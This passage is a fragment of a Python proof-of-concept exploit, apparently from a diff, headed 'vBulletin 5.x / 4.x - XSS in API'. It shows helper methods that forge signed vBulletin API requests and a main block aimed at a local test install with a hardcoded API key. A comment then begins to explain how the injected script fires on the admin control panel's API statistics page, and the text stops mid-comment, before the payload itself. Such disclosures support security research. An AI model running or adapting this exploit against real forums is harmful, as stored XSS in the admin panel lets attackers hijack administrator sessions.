return "&".join(ret) + + def _vb_build_api_sig(self, params): + apikey = self.params['apikey'] + login_string = self._ksort_urlencode(params) + access_token = str(self.session['apiaccesstoken']) + client_id = str(self.session['apiclientid']) + secret = str(self.session['secret']) + return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest() + + def _vb_build_regstring(self, api_sig): + params = { + 'api_c':self.session['apiclientid'], + 'api_s':self.session['apiaccesstoken'], + 'api_sig':api_sig, + 'api_v':self.session['apiversion'], + } + return params + + +if __name__=="__main__": + TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php" + APIKEY = "G4YvWVhp" + DEBUGLEVEL = 0 # 1 to enable request tracking + + print "vBulletin 5.x / 4.x - XSS in API" + ### 1. XSS + ''' + vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options + * enable vbulletin API = yes + * enable API log = yes + + xss in: + 1) http://xxxx/vb/admincp/apistats.php?do=client + 2) click on hex